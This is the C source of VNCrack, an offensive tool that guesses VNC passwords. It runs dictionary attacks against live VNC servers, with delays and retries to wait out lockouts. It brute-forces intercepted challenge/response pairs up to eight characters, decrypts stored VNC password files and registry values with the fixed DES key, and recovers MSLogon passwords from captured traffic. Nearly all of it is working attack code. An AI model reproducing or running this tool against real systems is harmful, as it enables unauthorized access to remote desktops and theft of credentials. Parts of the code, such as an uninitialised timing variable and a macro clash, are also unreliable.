/* Project code: vncrack
 *
 * FX <fx@phenoelit.de>
 * Phenoelit (http://www.phenoelit.de/)
 * (c) 2k
 *
 * Block sleep idea by Stonneway.
 * 
 * Updated with MSLogon Decryption 
 * Ashburn <deon_force@asia-global-risk.com>
 * AGR Brunei <http://www.asia-global-risk.com>
 *
 * The line edited or modified by deon_force is marked with "deon_force"
 *
 * $Id: vncrack.c,v 1.21 2006/04/21 16:33:41 Deon_Force $
 */
#include <stdio.h>
#include <string.h>
#include <syslog.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <unistd.h>
#include <sys/time.h>
#include <signal.h>
#include <stdlib.h>

#include "d3des.h"
/* defs out of libvncauth */ 
extern unsigned char fixedkey[8];
int vncEncryptAndStorePasswd(char *passwd, char *fname);
char *vncDecryptPasswdFromFile(char *fname);
void vncEncryptBytes(unsigned char *bytes, char *passwd);
char *vncDecryptPasswdMs(char *fname);          //deon_force

#define SPLASH "\nVNCrack - by Phenoelit (http://www.phenoelit.de/)\n$Revision: 1.21 $\n"
int verbose=0,lbf=0,cxorcrack,rxorcrack;   //deon_force                                
char	*schallange=NULL, *sresponse=NULL;
void interactive(void);
void cr_crack(char *wordlist);
void cr_xor(void);                             //deon_force

void *sec_malloc(size_t size) {
    void *p;

    if ((p=malloc(size))==NULL) {
	fprintf(stderr,"malloc() failed for %d bytes\n",size);
	exit (-1);
    }
    memset(p,0,size);
    return p;
}

void usage(void) {
    printf("VNCrack\n"
	    "$Id: vncrack.c,v 1.21 2006/04/21 fx // TDF $\n"
	    "by Phenoelit (http://www.phenoelit.de/)\n\n"\
	    "Usage:\n"
	    "Online: ./vncrack -h target.host.com -w wordlist.txt [-opt's]\n"
	    "Passwd: ./vncrack -C /home/some/user/.vnc/passwd\n"
	    "Windows interactive mode: ./vncrack -W \n"
	    "\tenter hex key one byte per line - find it in\n"
	    "\t\\HKEY_CURRENT_USER\\Software\\ORL\\WinVNC3\\Password or\n"
	    "\t\\HKEY_USERS\\.DEFAULT\\Software\\ORL\\WinVNC3\\Password\n\n"
	    "Options for online mode:\n"
	    "-v\tverbose\n"
	    "-d N\tSleep N nanoseconds between each try\n"
	    "-D N\tSleep N seconds between each try\n"
	    "-a\tJust a funny thing\n"
	    "-p P\tconnect to port P instead of 5900\n"
	    "-s N\tSleep N seconds in case connect() failed\n\n"
	    "Options for PHoss intercepted challenges:\n"
	    "-c <challenge>\tchallenge from PHoss output\n"
	    "-r <response>\tresponse from PHoss output\n\n"
	    "Options for intercepted MSLogon challenges:\n"     //deon_force
	    "-x <challenge>\tchallenge output\n"
	    "-y <response>\tresponse output\n\n"
	    );
    exit(-1);
}

int main(int argc, char **argv) {
    int		sfd;		/* socket */
    struct hostent	*dest;
    struct sockaddr_in	dest_addr;
    // char	*sbuf;
    char	*rbuf;
    unsigned char	atype[4];
    unsigned char	challange[16];

    
    char	*vnchost=NULL;
    int		vncport=5900;

    extern	char *optarg;
    int		option;
    int		i,ani=0;
    char	*wordlist=NULL;
    FILE	*fd;
    char	*tryword;

    struct timespec ts={0,0};
    int		conwait=90;
    int		redocount=0;
    int		redosleep=12;
    char	servertext[256];
    char	*sthelp;

    while ((option=getopt(argc,argv,"avWp:h:w:C:d:D:s:c:r:x:y:R"))!=EOF) {
	switch (option) {

	    case 'v':	/*verbose*/
		verbose++;
		break;
	    case 'a':	/* animation shit */
		ani=1;
		break;
	    case 'p':	/* port def */
		if ((vncport=atoi(optarg))==0) {
		    fprintf(stderr,"wrong port number: %s\n",optarg);
		    exit(-1);
		}
		break;
	    case 'h': 	/* hostname */
		vnchost=(char *)sec_malloc(strlen(optarg)+1);
		strcpy(vnchost,optarg);
		break;
	    case 'w':	/* wordlist file  */
		wordlist=(char *)sec_malloc(strlen(optarg)+1);
		strcpy(wordlist,optarg);
		break;
	    case 'd':
		if ((ts.tv_nsec=atol(optarg))==0) {
		    fprintf(stderr,"Delay of 0 ?\n");
		    exit(-1);
		}
		break;
	    case 'D':
		if ((ts.tv_sec=atoi(optarg))==0) {
		    fprintf(stderr,"Delay of 0 ?\n");
		    exit(-1);
		}
		break;
	    case 's':	/* for the 'cannot assign req. addr' stuff */
		conwait=atoi(optarg);
		break;
	    case 'C':	/* VNC passwd file */
		/* if the user just requests file decryption - here we go */
		printf("VNC password: %s\n",
			vncDecryptPasswdFromFile(optarg));
		exit(0);
		break;	/* not reached */
	    case 'W':	/* going interactive */
		interactive();
		break;	/* not reached */
	    case 'c': 	/* challange */
		schallange=(char *)sec_malloc(strlen(optarg)+1);
		strcpy(schallange,optarg);
		break;
	    case 'r': 	/* challange */
		sresponse=(char *)sec_malloc(strlen(optarg)+1);
		strcpy(sresponse,optarg);
		break;
/* deon_force - MSLogon Options created by deon_force*/
	    case 'x': 	/* challenge ;) */
		cxorcrack=1;
		schallange=(char *)sec_malloc(strlen(optarg)+1);
		strcpy(schallange,optarg);
		break;
	    case 'y': 	/* challenge :p */
		rxorcrack=1;
		sresponse=(char *)sec_malloc(strlen(optarg)+1);
		strcpy(sresponse,optarg);
		break;


	    case 'R':	/* redo sleep */
		redosleep=atoi(optarg);
		break;

	    default: usage();
	}
    }
    if (verbose) ani=0;

    if (schallange||sresponse) {
	printf(SPLASH);
	if ((cxorcrack)||(rxorcrack)) { cr_xor(); }//deon_force
	cr_crack(wordlist);	/* exit is done here */
    }

    if (!(vnchost&&vncport&&wordlist)) usage();
    printf(SPLASH);

    /* resolve host */
    if ((dest=gethostbyname(vnchost))==NULL) {
	syslog(LOG_ERR,"unable to resolve host %s",
		vnchost);
	exit (-1);
    }
    dest_addr.sin_family=AF_INET;
    dest_addr.sin_port=htons(vncport);
    bcopy(dest->h_addr,(char *)&dest_addr.sin_addr,dest->h_length);
    bzero(&(dest_addr.sin_zero),8);

    if ((fd=fopen(wordlist,"rt"))==NULL) {
	fprintf(stderr,"Unable to open wordlist %s\n",wordlist);
	exit (-1);
    }

    tryword=sec_malloc(256);
    while (fgets(tryword,255,fd)!=NULL) { 
    	/* cut the word */
    	/* if (strlen(tryword)>8) tryword[8]='\0'; */
	if (tryword[strlen(tryword)-1]=='\n') tryword[strlen(tryword)-1]='\0';

ReDoClosed:
	    
	if (verbose) {
	    printf("trying '%s' ...",tryword);
	    fflush(stdout);
	}

	if ((sfd=socket(AF_INET,SOCK_STREAM,0))==0) {
	    perror("socket()");
	    fprintf(stderr,"Sleeping for %d seconds before retry...\n",conwait);
	    sleep(conwait);
	    if ((sfd=socket(AF_INET,SOCK_STREAM,0))==0) {
		perror("socket()");
		fprintf(stderr,"Giving up!\n");
		exit (-1);
	    }
	}

	if (connect(sfd,(struct sockaddr *)&dest_addr,sizeof(dest_addr))<0) {
	    perror("connect()");
	    fprintf(stderr,"Sleeping for %d seconds before retry...\n",conwait);
	    close(sfd);
	    sleep(conwait);
	    if ((sfd=socket(AF_INET,SOCK_STREAM,0))==0) {
		perror("socket()");
		exit(-1);
	    }
	    if (connect(sfd,
			(struct sockaddr *)&dest_addr,sizeof(dest_addr))<0) {
		perror("connect()");
		fprintf(stderr,"Giving up!\n");
		exit(-1);
	    }
	}

	/* connunication starts with server->client version packet */
	rbuf=sec_malloc(100);
	if (recv(sfd,rbuf,100,0)<0) {
	    perror("recv()");
	    exit(-1);
	}
	if (verbose>1) printf("\nServer Protocol version: %s\n",rbuf);

	/* bounce this message back - so the server will continue */
	if (send(sfd,rbuf,strlen(rbuf),0)<0) {
	    perror("send()");
	    exit(-1);
	}

	if (recv(sfd,atype,sizeof(atype),0)<0) {
	    perror("atype recv()");
	    exit(-1);
	}

	if (verbose>1) {
	    printf("Authentication type: ");
	    for (i=0;i<4;i++) { printf("%x ",atype[i]); }
	    printf("\n");
	}

	switch (atype[3]) {
	    case 0:	fprintf(stderr,"Server told me: connection close\n");
			/* get more info */
			if (verbose) {
			    memset(servertext,0,sizeof(servertext));
			    if (recv(sfd,servertext,sizeof(servertext),0)<0) {
			    fprintf(stderr,"recv() in verbose");
				    exit(-1);
			    } else {
				    sthelp=(char *)servertext;
				    sthelp+=4;
				    fprintf(stderr,"Server says: %s\n",sthelp);
			    }
			    printf("\tWaiting for blocking disable\n");
			}
			sleep(redosleep);
			if ((redocount++)<3) {
			    goto ReDoClosed;
			} else {
			    fprintf(stderr,"\tgiving up (increase -R)\n");
			}
			exit(-1);
			break;	/* not reached */
	    case 1:	printf( "\n>>>>>>>>>>>>>>>\n"
				"Server does not require authentication!\n"
				">>>>>>>>>>>>>>>\n");
			exit(-1);
			break; /* not reached */
	    case 2:	if (verbose>1)
			    printf( "Authentication type "
				    "'VNC authentication' - fine\n");
			break;
	    default:	fprintf(stderr,"Unknown authentication requested"
				"by server\n");
			exit(-1);
	}
	redocount=0;
	
	if (recv(sfd,challange,sizeof(challange),0)<0) {
	    perror("challange recv()");
	    exit(-1);
	}
	if (verbose>1) {
	    printf("challange: ");
	    for (i=0;i<16;i++) { printf("%x ",challange[i]); }
	    printf("\n");
	}

	/* encrypt challange with password and send this fuck to the server */
	vncEncryptBytes(challange,tryword);

	if (send(sfd,challange,sizeof(challange),0)<0) {
	    perror("authentication send()");
	    exit(-1);
	}

	atype[3]=0;
	if (recv(sfd,atype,sizeof(atype),0)<0) {
	    perror("auth response recv()");
	    exit(-1);
	}
	switch (atype[3]) {
	    case 0:	printf( "\n>>>>>>>>>>>>>>>\n"
				"Password: %s\n"
				">>>>>>>>>>>>>>>\n",tryword);
			free(tryword);
			exit(0);
			break; /* not reached */
	    case 1:	/* 'normal' failed */
			if (verbose) printf("failed\n");
			break;
	    case 2:	/* too many */
			printf("Server is angry, waiting 2 minutes "
				"for calm down...\n");
			sleep(120);
			break;
	    default:	fprintf(stderr,"Unknown response\n");
			exit(-1);
	}

	shutdown(sfd,2);

	close(sfd);
	memset(tryword,0,256);

	if (ani) {
	    switch (ani) {
		case 1: printf("\b|");
			break;
		case 2: printf("\b/");
			break;
		case 3: printf("\b-");
			break;
		case 4: printf("\b\\");
			ani=0;
			break;
	    }
	    ani++;
	    fflush(stdout);
	}

	if (ts.tv_nsec||ts.tv_sec) {
	    nanosleep(&ts,NULL);
	}

    }
    free(tryword);
    fclose(fd);

    return 0;
}

void interactive(void) {
    unsigned char 	*pass;
    int		i;
    char	c;

    pass=(unsigned char *)sec_malloc(9);    //deon_force
    for (i=0;i<8;i++) {
	scanf("%x",&c);
	pass[i]=c;
    }
    printf("Entered HEX String: ");
    for (i=0;i<8;i++) { printf("%x ",pass[i]); }
    printf("\n");

    deskey(fixedkey,DE1);
    des(pass,pass);
    printf("VNC Password: %s\n",pass);

    exit(0);
}

void cr_crack(char *wordlist) {
    int	i,j;
#define CRL	16
    char	chl[CRL+1];
    char	rsp[CRL+1];
    char	tchl[CRL+1];
    char	ts[3];
    FILE	*fd;
    char	*tryword;

    char	bft[9];
    /* char	cset1[] = 
	"abcdefghijklmnopqrstuvwxyz"
	"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
	"1234567890\0";*/
    char	cset1[] = 
	"abcdefghijklmnopqrstuvwxyz"
	"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
	"1234567890!\"$%&/()=?`''*_:;-.,#+}][{^<>\0";
#define cset1_len	(92)
    int		cnt[8];

    time_t	t1,t2;


    if ((!schallange)||(!sresponse)) {
	usage();
    }
    if (
	    (strlen(schallange)!=16*2)
	    ||(strlen(sresponse)!=16*2)
	    ) {
	fprintf(stderr,
		"challange and response have to be 32 characters each\n");
	exit (-1);
    }

    memset(&chl,0,CRL+1);
    memset(&tchl,0,CRL+1);
    memset(&rsp,0,CRL+1);
    memset(&ts,0,3);

    j=0;
    for (i=0;i<CRL;i++) {
	strncpy(ts,&schallange[j],2);
	chl[i]=(unsigned char)strtol(ts,NULL,16);
	strncpy(ts,&sresponse[j],2);
	rsp[i]=(unsigned char)strtol(ts,NULL,16);
	j+=2;
    }
    if (verbose) {
	printf("Challange: ");
	for (i=0;i<CRL;i++) {
	    printf("%x",(unsigned char) chl[i]);
	}
	printf("\n");
	printf("Response : ");
	for (i=0;i<CRL;i++) {
	    printf("%x",(unsigned char) rsp[i]);
	}
	printf("\n");
    }

    if ((fd=fopen(wordlist,"rt"))==NULL) {
	fprintf(stderr,"Could not open wordlist\n");
	exit (-1);
    }

    tryword=sec_malloc(256);
    while (fgets(tryword,255,fd)!=NULL) {
	tryword[strlen(tryword)-1]='\0';
	/* try this word */
	memcpy(tchl,chl,CRL);
	vncEncryptBytes((unsigned char *)tchl,tryword);      //deon_force

	if (verbose>1) {
	    for (i=0;i<CRL;i++) {
		printf("%x",(unsigned char) rsp[i]);
	    }
	    printf("\n");
	    for (i=0;i<CRL;i++) {
		printf("%x",(unsigned char) tchl[i]);
	    }
	    printf("\n");
	}

	if (!memcmp(tchl,rsp,CRL)) {
	    printf( "\n>>>>>>>>>>>>>>>\n"
		    "Password: %s\n"
		    ">>>>>>>>>>>>>>>\n",tryword);
	    free(tryword);
	    exit(0);
	} else {
	    if (verbose) printf("%s failed\n",tryword);
	}
	memset(tryword,0,256);
    }
    fclose(fd);
    free(tryword);

    printf( "-----------------------------------\n"
	    "Wordlist failed - going brute force\n"
	    "-----------------------------------\n" );

    bft[8]='\0';

    bft[1]='\0';
    printf("\tdepth I\n");
				for (cnt[0]=0;cnt[0]<cset1_len;cnt[0]++) {
				    bft[0]=cset1[cnt[0]];

				    if (verbose) 
					printf("try: %s\n",bft);

				    memcpy(tchl,chl,CRL);
				    vncEncryptBytes((unsigned char *)tchl,bft);   //deon_force
				    if (!memcmp(tchl,rsp,16)) {
					printf( "\n>>>>>>>>>>>>>>>\n"
						"Password: %s\n"
						">>>>>>>>>>>>>>>\n",
						bft);
					exit (0);
				    }
				} // for 0

    bft[2]='\0';
    printf("\tdepth II\n");
			    for (cnt[1]=0;cnt[1]<cset1_len;cnt[1]++) {
				bft[1]=cset1[cnt[1]];

				for (cnt[0]=0;cnt[0]<cset1_len;cnt[0]++) {
				    bft[0]=cset1[cnt[0]];

				    if (verbose) 
					printf("try: %s\n",bft);

				    memcpy(tchl,chl,CRL);
				    vncEncryptBytes((unsigned char *)tchl,bft);   //deon_force
				    if (!memcmp(tchl,rsp,16)) {
					printf( "\n>>>>>>>>>>>>>>>\n"
						"Password: %s\n"
						">>>>>>>>>>>>>>>\n",
						bft);
					exit (0);
				    }
				} // for 0
			    } // for 1

    /************/
    bft[3]='\0';
    printf("\tdepth III\n");
			for (cnt[2]=0;cnt[2]<cset1_len;cnt[2]++) {
			    bft[2]=cset1[cnt[2]];

			    for (cnt[1]=0;cnt[1]<cset1_len;cnt[1]++) {
				bft[1]=cset1[cnt[1]];

				for (cnt[0]=0;cnt[0]<cset1_len;cnt[0]++) {
				    bft[0]=cset1[cnt[0]];

				    if (verbose) 
					printf("try: %s\n",bft);

				    memcpy(tchl,chl,CRL);
				    vncEncryptBytes((unsigned char *)tchl,bft);   //deon_force
				    if (!memcmp(tchl,rsp,16)) {
					printf( "\n>>>>>>>>>>>>>>>\n"
						"Password: %s\n"
						">>>>>>>>>>>>>>>\n",
						bft);
					exit (0);
				    }
				} // for 0
			    } // for 1
			} //2

    /************/
    bft[4]='\0';
    printf("\tdepth IV\n");
		    for (cnt[3]=0;cnt[3]<cset1_len;cnt[3]++) {
			bft[3]=cset1[cnt[3]];

			for (cnt[2]=0;cnt[2]<cset1_len;cnt[2]++) {
			    bft[2]=cset1[cnt[2]];

			    for (cnt[1]=0;cnt[1]<cset1_len;cnt[1]++) {
				bft[1]=cset1[cnt[1]];

				for (cnt[0]=0;cnt[0]<cset1_len;cnt[0]++) {
				    bft[0]=cset1[cnt[0]];

				    if (verbose) 
					printf("try: %s\n",bft);

				    memcpy(tchl,chl,CRL);
				    vncEncryptBytes((unsigned char *)tchl,bft);   //deon_force
				    if (!memcmp(tchl,rsp,16)) {
					printf( "\n>>>>>>>>>>>>>>>\n"
						"Password: %s\n"
						">>>>>>>>>>>>>>>\n",
						bft);
					exit (0);
				    }
				} // for 0
			    } // for 1
			} //2
		    } //3

    /************/
    bft[5]='\0';
    printf("\tdepth V\n");
		for (cnt[4]=0;cnt[4]<cset1_len;cnt[4]++) {
		    bft[4]=cset1[cnt[4]];

		    for (cnt[3]=0;cnt[3]<cset1_len;cnt[3]++) {
			bft[3]=cset1[cnt[3]];

			for (cnt[2]=0;cnt[2]<cset1_len;cnt[2]++) {
			    bft[2]=cset1[cnt[2]];

			    for (cnt[1]=0;cnt[1]<cset1_len;cnt[1]++) {
				bft[1]=cset1[cnt[1]];

				for (cnt[0]=0;cnt[0]<cset1_len;cnt[0]++) {
				    bft[0]=cset1[cnt[0]];

				    if (verbose) 
					printf("try: %s\n",bft);

				    memcpy(tchl,chl,CRL);
				    vncEncryptBytes((unsigned char *)tchl,bft);   //deon_force
				    if (!memcmp(tchl,rsp,16)) {
					printf( "\n>>>>>>>>>>>>>>>\n"
						"Password: %s\n"
						">>>>>>>>>>>>>>>\n",
						bft);
					exit (0);
				    }
				} // for 0
			    } // for 1
			} //2
		    } //3
		} //4

    /************/
    bft[6]='\0';
    printf("\tdepth VI\n");
	    for (cnt[5]=0;cnt[5]<cset1_len;cnt[5]++) {
		bft[5]=cset1[cnt[5]];

		for (cnt[4]=0;cnt[4]<cset1_len;cnt[4]++) {
		    bft[4]=cset1[cnt[4]];

		    for (cnt[3]=0;cnt[3]<cset1_len;cnt[3]++) {
			bft[3]=cset1[cnt[3]];

			for (cnt[2]=0;cnt[2]<cset1_len;cnt[2]++) {
			    bft[2]=cset1[cnt[2]];

			    for (cnt[1]=0;cnt[1]<cset1_len;cnt[1]++) {
				bft[1]=cset1[cnt[1]];

				for (cnt[0]=0;cnt[0]<cset1_len;cnt[0]++) {
				    bft[0]=cset1[cnt[0]];

				    if (verbose) 
					printf("try: %s\n",bft);

				    memcpy(tchl,chl,CRL);
				    vncEncryptBytes((unsigned char *)tchl,bft);   //deon_force
				    if (!memcmp(tchl,rsp,16)) {
					printf( "\n>>>>>>>>>>>>>>>\n"
						"Password: %s\n"
						">>>>>>>>>>>>>>>\n",
						bft);
					exit (0);
				    }
				} // for 0
			    } // for 1
			} //2
		    } //3
		} //4
	    } //5

    /************/
    bft[7]='\0';
    printf("\tdepth VII\n");
	for (cnt[6]=0;cnt[6]<cset1_len;cnt[6]++) {
	    bft[6]=cset1[cnt[6]];

	    for (cnt[5]=0;cnt[5]<cset1_len;cnt[5]++) {
		bft[5]=cset1[cnt[5]];

		for (cnt[4]=0;cnt[4]<cset1_len;cnt[4]++) {
		    bft[4]=cset1[cnt[4]];

		    for (cnt[3]=0;cnt[3]<cset1_len;cnt[3]++) {
			bft[3]=cset1[cnt[3]];

			for (cnt[2]=0;cnt[2]<cset1_len;cnt[2]++) {
			    bft[2]=cset1[cnt[2]];

			    for (cnt[1]=0;cnt[1]<cset1_len;cnt[1]++) {
				bft[1]=cset1[cnt[1]];

				for (cnt[0]=0;cnt[0]<cset1_len;cnt[0]++) {
				    bft[0]=cset1[cnt[0]];

				    if (verbose) 
					printf("try: %s\n",bft);

				    memcpy(tchl,chl,CRL);
				    vncEncryptBytes((unsigned char *)tchl,bft);   //deon_force
				    if (!memcmp(tchl,rsp,16)) {
					printf( "\n>>>>>>>>>>>>>>>\n"
						"Password: %s\n"
						">>>>>>>>>>>>>>>\n",
						bft);
					exit (0);
				    }
				} // for 0
			    } // for 1
			} //2
		    } //3
		} //4
	    } //5
	} //6

    /************/
    bft[8]='\0';
    printf("\tdepth VIII\n");
    for (cnt[7]=0;cnt[7]<cset1_len;cnt[7]++) {
	bft[7]=cset1[cnt[7]];

	for (cnt[6]=0;cnt[6]<cset1_len;cnt[6]++) {
	    bft[6]=cset1[cnt[6]];

	    for (cnt[5]=0;cnt[5]<cset1_len;cnt[5]++) {
		bft[5]=cset1[cnt[5]];

		for (cnt[4]=0;cnt[4]<cset1_len;cnt[4]++) {
		    bft[4]=cset1[cnt[4]];

		    for (cnt[3]=0;cnt[3]<cset1_len;cnt[3]++) {
			bft[3]=cset1[cnt[3]];

			for (cnt[2]=0;cnt[2]<cset1_len;cnt[2]++) {
			    bft[2]=cset1[cnt[2]];

			    for (cnt[1]=0;cnt[1]<cset1_len;cnt[1]++) {
				bft[1]=cset1[cnt[1]];

				for (cnt[0]=0;cnt[0]<cset1_len;cnt[0]++) {
				    bft[0]=cset1[cnt[0]];

				    if (verbose) 
					printf("try: %s\n",bft);

				    memcpy(tchl,chl,CRL);
				    vncEncryptBytes((unsigned char *)tchl,bft);   //deon_force
				    if (!memcmp(tchl,rsp,16)) {
					printf( "\n>>>>>>>>>>>>>>>\n"
						"Password: %s\n"
						">>>>>>>>>>>>>>>\n",
						bft);
					exit (0);
				    }
				} // for 0
			    } // for 1
			} //2
		    } //3
		} //4
	    } //5
	} //6
    } //7
    t2=time(NULL);
    printf("depth VIII (%20.4f wps)\n",(t2-t1)/63);

    printf("Not in character set !\n");

    exit(0);
}
/* deon_force - MSLogon Decryption */

void cr_xor(void)
{
	int	i,j,MSCRL;
	char	ts[3];
	char    encPasswdMs[32]; // encrypted password
#define MSCRL 64
	char	chl[MSCRL+1]; // challenge
	char	rsp[MSCRL+1]; // response

	if ((strlen(schallange)!=32*2)||(strlen(sresponse)!=32*2)) 
    	{
		fprintf(stderr,"\nERROR: Challenge and Response have to be 64 characters each.\n\n");
		exit (-1);
    	}

   	memset(&chl,0,MSCRL+1);
    	memset(&rsp,0,MSCRL+1); 
    	memset(&ts,0,3);
    	j=0;
    	for (i=0;i<MSCRL;i++) 
        {
		strncpy(ts,&schallange[j],2); //
		chl[i]=(unsigned char)strtol(ts,NULL,16);
		strncpy(ts,&sresponse[j],2);
		rsp[i]=(unsigned char)strtol(ts,NULL,16);
 		j+=2;
	}
	
	for (i=0;i<32;i++) 
    { 
        encPasswdMs[i]=rsp[i]^chl[i]; 
    }
	char *plainmsPasswd = vncDecryptPasswdMs((char*)encPasswdMs);
	
	printf("\n=========================================");
	printf("\nMSLogon Password  is: %s",plainmsPasswd);
	printf("\n=========================================\n");
exit(0);
}
